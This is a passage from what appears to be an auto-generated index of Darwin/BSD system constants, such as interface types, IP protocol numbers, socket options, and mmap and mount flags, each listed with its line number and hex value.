| IFT_PPP = 0x17 constant IFT_PROPMUX (line 621) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 622) | IFT_PROPVIRTUAL = 0x35 constant IFT_PTPSERIAL (line 623) | IFT_PTPSERIAL = 0x16 constant IFT_RS232 (line 624) | IFT_RS232 = 0x21 constant IFT_SDLC (line 625) | IFT_SDLC = 0x11 constant IFT_SIP (line 626) | IFT_SIP = 0x1f constant IFT_SLIP (line 627) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 628) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 629) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 630) | IFT_SONET = 0x27 constant IFT_SONETPATH (line 631) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 632) | IFT_SONETVT = 0x33 constant IFT_STARLAN (line 633) | IFT_STARLAN = 0xb constant IFT_STF (line 634) | IFT_STF = 0x39 constant IFT_T1 (line 635) | IFT_T1 = 0x12 constant IFT_ULTRA (line 636) | IFT_ULTRA = 0x1d constant IFT_V35 (line 637) | IFT_V35 = 0x2d constant IFT_X25 (line 638) | IFT_X25 = 0x5 constant IFT_X25DDN (line 639) | IFT_X25DDN = 0x4 constant IFT_X25PLE (line 640) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 641) | IFT_XETHER = 0x1a constant IGNBRK (line 642) | IGNBRK = 0x1 constant IGNCR (line 643) | IGNCR = 0x80 constant IGNPAR (line 644) | IGNPAR = 0x4 constant IMAXBEL (line 645) | IMAXBEL = 0x2000 constant INLCR (line 646) | INLCR = 0x40 constant INPCK (line 647) | INPCK = 0x10 constant IN_CLASSA_HOST (line 648) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 649) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 650) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 651) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 652) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 653) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 654) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 655) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 656) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 657) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 658) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 659) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 660) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 661) | IN_CLASSD_NSHIFT = 0x1c constant IN_LINKLOCALNETNUM (line 662) | IN_LINKLOCALNETNUM = 0xa9fe0000 constant IN_LOOPBACKNET (line 663) | IN_LOOPBACKNET = 0x7f constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 664) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x400473d1 constant IPPROTO_3PC (line 665) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 666) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 667) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 668) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 669) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 670) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 671) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 672) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 673) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 674) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CFTP (line 675) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 676) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 677) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 678) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 679) | IPPROTO_CPNX = 0x48 constant IPPROTO_DDP (line 680) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 681) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 682) | IPPROTO_DIVERT = 0xfe constant IPPROTO_DONE (line 683) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 684) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 685) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 686) | IPPROTO_EMCON = 0xe constant IPPROTO_ENCAP (line 687) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 688) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 689) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 690) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 691) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 692) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 693) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 694) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 695) | IPPROTO_HELLO = 0x3f constant IPPROTO_HMP (line 696) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 697) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 698) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 699) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 700) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 701) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 702) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 703) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 704) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 705) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 706) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 707) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 708) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 709) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 710) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 711) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 712) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 713) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 714) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 715) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 716) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 717) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 718) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 719) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 720) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 721) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 722) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 723) | IPPROTO_MAXID = 0x34 constant IPPROTO_MEAS (line 724) | IPPROTO_MEAS = 0x13 constant IPPROTO_MHRP (line 725) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 726) | IPPROTO_MICP = 0x5f constant IPPROTO_MTP (line 727) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 728) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 729) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 730) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 731) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 732) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 733) | IPPROTO_NVPII = 0xb constant IPPROTO_OSPFIGP (line 734) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PGM (line 735) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 736) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 737) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 738) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 739) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 740) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 741) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 742) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 743) | IPPROTO_RDP = 0x1b constant IPPROTO_ROUTING (line 744) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 745) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 746) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 747) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 748) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 749) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SCTP (line 750) | IPPROTO_SCTP = 0x84 constant IPPROTO_SDRP (line 751) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEP (line 752) | IPPROTO_SEP = 0x21 constant IPPROTO_SRPC (line 753) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 754) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 755) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 756) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 757) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 758) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 759) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 760) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 761) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 762) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 763) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 764) | IPPROTO_UDP = 0x11 constant IPPROTO_VINES (line 765) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 766) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 767) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 768) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 769) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 770) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 771) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 772) | IPPROTO_XTP = 0x24 constant IPV6_2292DSTOPTS (line 773) | IPV6_2292DSTOPTS = 0x17 constant IPV6_2292HOPLIMIT (line 774) | IPV6_2292HOPLIMIT = 0x14 constant IPV6_2292HOPOPTS (line 775) | IPV6_2292HOPOPTS = 0x16 constant IPV6_2292NEXTHOP (line 776) | IPV6_2292NEXTHOP = 0x15 constant IPV6_2292PKTINFO (line 777) | IPV6_2292PKTINFO = 0x13 constant IPV6_2292PKTOPTIONS (line 778) | IPV6_2292PKTOPTIONS = 0x19 constant IPV6_2292RTHDR (line 779) | IPV6_2292RTHDR = 0x18 constant IPV6_3542DSTOPTS (line 780) | IPV6_3542DSTOPTS = 0x32 constant IPV6_3542HOPLIMIT (line 781) | IPV6_3542HOPLIMIT = 0x2f constant IPV6_3542HOPOPTS (line 782) | IPV6_3542HOPOPTS = 0x31 constant IPV6_3542NEXTHOP (line 783) | IPV6_3542NEXTHOP = 0x30 constant IPV6_3542PKTINFO (line 784) | IPV6_3542PKTINFO = 0x2e constant IPV6_3542RTHDR (line 785) | IPV6_3542RTHDR = 0x33 constant IPV6_ADDR_MC_FLAGS_PREFIX (line 786) | IPV6_ADDR_MC_FLAGS_PREFIX = 0x20 constant IPV6_ADDR_MC_FLAGS_TRANSIENT (line 787) | IPV6_ADDR_MC_FLAGS_TRANSIENT = 0x10 constant IPV6_ADDR_MC_FLAGS_UNICAST_BASED (line 788) | IPV6_ADDR_MC_FLAGS_UNICAST_BASED = 0x30 constant IPV6_AUTOFLOWLABEL (line 789) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDV6ONLY (line 790) | IPV6_BINDV6ONLY = 0x1b constant IPV6_BOUND_IF (line 791) | IPV6_BOUND_IF = 0x7d constant IPV6_CHECKSUM (line 792) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 793) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 794) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 795) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 796) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 797) | IPV6_DSTOPTS = 0x32 constant IPV6_FAITH (line 798) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 799) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 800) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FLOW_ECN_MASK (line 801) | IPV6_FLOW_ECN_MASK = 0x3000 constant IPV6_FRAGTTL (line 802) | IPV6_FRAGTTL = 0x3c constant IPV6_FW_ADD (line 803) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 804) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 805) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 806) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 807) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 808) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 809) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 810) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 811) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 812) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 813) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 814) | IPV6_MAXHLIM = 0xff constant IPV6_MAXOPTHDR (line 815) | IPV6_MAXOPTHDR = 0x800 constant IPV6_MAXPACKET (line 816) | IPV6_MAXPACKET = 0xffff constant IPV6_MAX_GROUP_SRC_FILTER (line 817) | IPV6_MAX_GROUP_SRC_FILTER = 0x200 constant IPV6_MAX_MEMBERSHIPS (line 818) | IPV6_MAX_MEMBERSHIPS = 0xfff constant IPV6_MAX_SOCK_SRC_FILTER (line 819) | IPV6_MAX_SOCK_SRC_FILTER = 0x80 constant IPV6_MIN_MEMBERSHIPS (line 820) | IPV6_MIN_MEMBERSHIPS = 0x1f constant IPV6_MMTU (line 821) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 822) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 823) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 824) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 825) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 826) | IPV6_NEXTHOP = 0x30 constant IPV6_PATHMTU (line 827) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 828) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 829) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 830) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 831) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 832) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_PREFER_TEMPADDR (line 833) | IPV6_PREFER_TEMPADDR = 0x3f constant IPV6_RECVDSTOPTS (line 834) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 835) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 836) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 837) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 838) | IPV6_RECVPKTINFO = 0x3d constant IPV6_RECVRTHDR (line 839) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 840) | IPV6_RECVTCLASS = 0x23 constant IPV6_RTHDR (line 841) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 842) | IPV6_RTHDRDSTOPTS = 0x39 constant IPV6_RTHDR_LOOSE (line 843) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 844) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 845) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 846) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 847) | IPV6_TCLASS = 0x24 constant IPV6_UNICAST_HOPS (line 848) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 849) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 850) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 851) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 852) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 853) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 854) | IP_ADD_SOURCE_MEMBERSHIP = 0x46 constant IP_BLOCK_SOURCE (line 855) | IP_BLOCK_SOURCE = 0x48 constant IP_BOUND_IF (line 856) | IP_BOUND_IF = 0x19 constant IP_DEFAULT_MULTICAST_LOOP (line 857) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 858) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 859) | IP_DF = 0x4000 constant IP_DONTFRAG (line 860) | IP_DONTFRAG = 0x1c constant IP_DROP_MEMBERSHIP (line 861) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 862) | IP_DROP_SOURCE_MEMBERSHIP = 0x47 constant IP_DUMMYNET_CONFIGURE (line 863) | IP_DUMMYNET_CONFIGURE = 0x3c constant IP_DUMMYNET_DEL (line 864) | IP_DUMMYNET_DEL = 0x3d constant IP_DUMMYNET_FLUSH (line 865) | IP_DUMMYNET_FLUSH = 0x3e constant IP_DUMMYNET_GET (line 866) | IP_DUMMYNET_GET = 0x40 constant IP_FAITH (line 867) | IP_FAITH = 0x16 constant IP_FW_ADD (line 868) | IP_FW_ADD = 0x28 constant IP_FW_DEL (line 869) | IP_FW_DEL = 0x29 constant IP_FW_FLUSH (line 870) | IP_FW_FLUSH = 0x2a constant IP_FW_GET (line 871) | IP_FW_GET = 0x2c constant IP_FW_RESETLOG (line 872) | IP_FW_RESETLOG = 0x2d constant IP_FW_ZERO (line 873) | IP_FW_ZERO = 0x2b constant IP_HDRINCL (line 874) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 875) | IP_IPSEC_POLICY = 0x15 constant IP_MAXPACKET (line 876) | IP_MAXPACKET = 0xffff constant IP_MAX_GROUP_SRC_FILTER (line 877) | IP_MAX_GROUP_SRC_FILTER = 0x200 constant IP_MAX_MEMBERSHIPS (line 878) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MAX_SOCK_MUTE_FILTER (line 879) | IP_MAX_SOCK_MUTE_FILTER = 0x80 constant IP_MAX_SOCK_SRC_FILTER (line 880) | IP_MAX_SOCK_SRC_FILTER = 0x80 constant IP_MF (line 881) | IP_MF = 0x2000 constant IP_MIN_MEMBERSHIPS (line 882) | IP_MIN_MEMBERSHIPS = 0x1f constant IP_MSFILTER (line 883) | IP_MSFILTER = 0x4a constant IP_MSS (line 884) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 885) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_IFINDEX (line 886) | IP_MULTICAST_IFINDEX = 0x42 constant IP_MULTICAST_LOOP (line 887) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 888) | IP_MULTICAST_TTL = 0xa constant IP_MULTICAST_VIF (line 889) | IP_MULTICAST_VIF = 0xe constant IP_NAT__XXX (line 890) | IP_NAT__XXX = 0x37 constant IP_OFFMASK (line 891) | IP_OFFMASK = 0x1fff constant IP_OLD_FW_ADD (line 892) | IP_OLD_FW_ADD = 0x32 constant IP_OLD_FW_DEL (line 893) | IP_OLD_FW_DEL = 0x33 constant IP_OLD_FW_FLUSH (line 894) | IP_OLD_FW_FLUSH = 0x34 constant IP_OLD_FW_GET (line 895) | IP_OLD_FW_GET = 0x36 constant IP_OLD_FW_RESETLOG (line 896) | IP_OLD_FW_RESETLOG = 0x38 constant IP_OLD_FW_ZERO (line 897) | IP_OLD_FW_ZERO = 0x35 constant IP_OPTIONS (line 898) | IP_OPTIONS = 0x1 constant IP_PKTINFO (line 899) | IP_PKTINFO = 0x1a constant IP_PORTRANGE (line 900) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 901) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 902) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 903) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 904) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 905) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 906) | IP_RECVOPTS = 0x5 constant IP_RECVPKTINFO (line 907) | IP_RECVPKTINFO = 0x1a constant IP_RECVRETOPTS (line 908) | IP_RECVRETOPTS = 0x6 constant IP_RECVTOS (line 909) | IP_RECVTOS = 0x1b constant IP_RECVTTL (line 910) | IP_RECVTTL = 0x18 constant IP_RETOPTS (line 911) | IP_RETOPTS = 0x8 constant IP_RF (line 912) | IP_RF = 0x8000 constant IP_RSVP_OFF (line 913) | IP_RSVP_OFF = 0x10 constant IP_RSVP_ON (line 914) | IP_RSVP_ON = 0xf constant IP_RSVP_VIF_OFF (line 915) | IP_RSVP_VIF_OFF = 0x12 constant IP_RSVP_VIF_ON (line 916) | IP_RSVP_VIF_ON = 0x11 constant IP_STRIPHDR (line 917) | IP_STRIPHDR = 0x17 constant IP_TOS (line 918) | IP_TOS = 0x3 constant IP_TRAFFIC_MGT_BACKGROUND (line 919) | IP_TRAFFIC_MGT_BACKGROUND = 0x41 constant IP_TTL (line 920) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 921) | IP_UNBLOCK_SOURCE = 0x49 constant ISIG (line 922) | ISIG = 0x80 constant ISTRIP (line 923) | ISTRIP = 0x20 constant IUTF8 (line 924) | IUTF8 = 0x4000 constant IXANY (line 925) | IXANY = 0x800 constant IXOFF (line 926) | IXOFF = 0x400 constant IXON (line 927) | IXON = 0x200 constant KERN_HOSTNAME (line 928) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 929) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 930) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 931) | KERN_VERSION = 0x4 constant LOCAL_PEERCRED (line 932) | LOCAL_PEERCRED = 0x1 constant LOCAL_PEEREPID (line 933) | LOCAL_PEEREPID = 0x3 constant LOCAL_PEEREUUID (line 934) | LOCAL_PEEREUUID = 0x5 constant LOCAL_PEERPID (line 935) | LOCAL_PEERPID = 0x2 constant LOCAL_PEERTOKEN (line 936) | LOCAL_PEERTOKEN = 0x6 constant LOCAL_PEERUUID (line 937) | LOCAL_PEERUUID = 0x4 constant LOCK_EX (line 938) | LOCK_EX = 0x2 constant LOCK_NB (line 939) | LOCK_NB = 0x4 constant LOCK_SH (line 940) | LOCK_SH = 0x1 constant LOCK_UN (line 941) | LOCK_UN = 0x8 constant MADV_CAN_REUSE (line 942) | MADV_CAN_REUSE = 0x9 constant MADV_DONTNEED (line 943) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 944) | MADV_FREE = 0x5 constant MADV_FREE_REUSABLE (line 945) | MADV_FREE_REUSABLE = 0x7 constant MADV_FREE_REUSE (line 946) | MADV_FREE_REUSE = 0x8 constant MADV_NORMAL (line 947) | MADV_NORMAL = 0x0 constant MADV_PAGEOUT (line 948) | MADV_PAGEOUT = 0xa constant MADV_RANDOM (line 949) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 950) | MADV_SEQUENTIAL = 0x2 constant MADV_WILLNEED (line 951) | MADV_WILLNEED = 0x3 constant MADV_ZERO_WIRED_PAGES (line 952) | MADV_ZERO_WIRED_PAGES = 0x6 constant MAP_32BIT (line 953) | MAP_32BIT = 0x8000 constant MAP_ANON (line 954) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 955) | MAP_ANONYMOUS = 0x1000 constant MAP_COPY (line 956) | MAP_COPY = 0x2 constant MAP_FILE (line 957) | MAP_FILE = 0x0 constant MAP_FIXED (line 958) | MAP_FIXED = 0x10 constant MAP_HASSEMAPHORE (line 959) | MAP_HASSEMAPHORE = 0x200 constant MAP_JIT (line 960) | MAP_JIT = 0x800 constant MAP_NOCACHE (line 961) | MAP_NOCACHE = 0x400 constant MAP_NOEXTEND (line 962) | MAP_NOEXTEND = 0x100 constant MAP_NORESERVE (line 963) | MAP_NORESERVE = 0x40 constant MAP_PRIVATE (line 964) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 965) | MAP_RENAME = 0x20 constant MAP_RESERVED0080 (line 966) | MAP_RESERVED0080 = 0x80 constant MAP_RESILIENT_CODESIGN (line 967) | MAP_RESILIENT_CODESIGN = 0x2000 constant MAP_RESILIENT_MEDIA (line 968) | MAP_RESILIENT_MEDIA = 0x4000 constant MAP_SHARED (line 969) | MAP_SHARED = 0x1 constant MAP_TRANSLATED_ALLOW_EXECUTE (line 970) | MAP_TRANSLATED_ALLOW_EXECUTE = 0x20000 constant MAP_UNIX03 (line 971) | MAP_UNIX03 = 0x40000 constant MCAST_BLOCK_SOURCE (line 972) | MCAST_BLOCK_SOURCE = 0x54 constant MCAST_EXCLUDE (line 973) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 974) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 975) | MCAST_JOIN_GROUP = 0x50 constant MCAST_JOIN_SOURCE_GROUP (line 976) | MCAST_JOIN_SOURCE_GROUP = 0x52 constant MCAST_LEAVE_GROUP (line 977) | MCAST_LEAVE_GROUP = 0x51 constant MCAST_LEAVE_SOURCE_GROUP (line 978) | MCAST_LEAVE_SOURCE_GROUP = 0x53 constant MCAST_UNBLOCK_SOURCE (line 979) | MCAST_UNBLOCK_SOURCE = 0x55 constant MCAST_UNDEFINED (line 980) | MCAST_UNDEFINED = 0x0 constant MCL_CURRENT (line 981) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 982) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 983) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 984) | MNT_AUTOMOUNTED = 0x400000 constant MNT_CMDFLAGS (line 985) | MNT_CMDFLAGS = 0xf0000 constant MNT_CPROTECT (line 986) | MNT_CPROTECT = 0x80 constant MNT_DEFWRITE (line 987) | MNT_DEFWRITE = 0x2000000 constant MNT_DONTBROWSE (line 988) | MNT_DONTBROWSE = 0x100000 constant MNT_DOVOLFS (line 989) | MNT_DOVOLFS = 0x8000 constant MNT_DWAIT (line 990) | MNT_DWAIT = 0x4 constant MNT_EXPORTED (line 991) | MNT_EXPORTED = 0x100 constant MNT_EXT_ROOT_DATA_VOL (line 992) | MNT_EXT_ROOT_DATA_VOL = 0x1 constant MNT_FORCE (line 993) | MNT_FORCE = 0x80000 constant MNT_IGNORE_OWNERSHIP (line 994) | MNT_IGNORE_OWNERSHIP = 0x200000 constant MNT_JOURNALED (line 995) | MNT_JOURNALED = 0x800000 constant MNT_LOCAL (line 996) | MNT_LOCAL = 0x1000 constant MNT_MULTILABEL (line 997) | MNT_MULTILABEL = 0x4000000 constant MNT_NOATIME (line 998) | MNT_NOATIME = 0x10000000 constant MNT_NOBLOCK (line 999) | MNT_NOBLOCK = 0x20000 constant MNT_NODEV (line 1000) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1001) | MNT_NOEXEC = 0x4 constant MNT_NOSUID (line 1002) | MNT_NOSUID = 0x8 constant MNT_NOUSERXATTR (line 1003) | MNT_NOUSERXATTR = 0x1000000 constant MNT_NOWAIT (line 1004) | MNT_NOWAIT = 0x2 constant MNT_QUARANTINE (line 1005) | MNT_QUARANTINE = 0x400 constant MNT_QUOTA (line 1006) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1007) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1008) | MNT_RELOAD = 0x40000 constant MNT_REMOVABLE (line 1009) | MNT_REMOVABLE = 0x200 constant MNT_ROOTFS (line 1010) | MNT_ROOTFS = 0x4000 constant MNT_SNAPSHOT (line 1011) | MNT_SNAPSHOT = 0x40000000 constant MNT_STRICTATIME (line 1012) | MNT_STRICTATIME = 0x80000000 constant MNT_SYNCHRONOUS (line 1013) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1014) | MNT_UNION = 0x20 constant MNT_UNKNOWNPERMISSIONS (line 1015) | 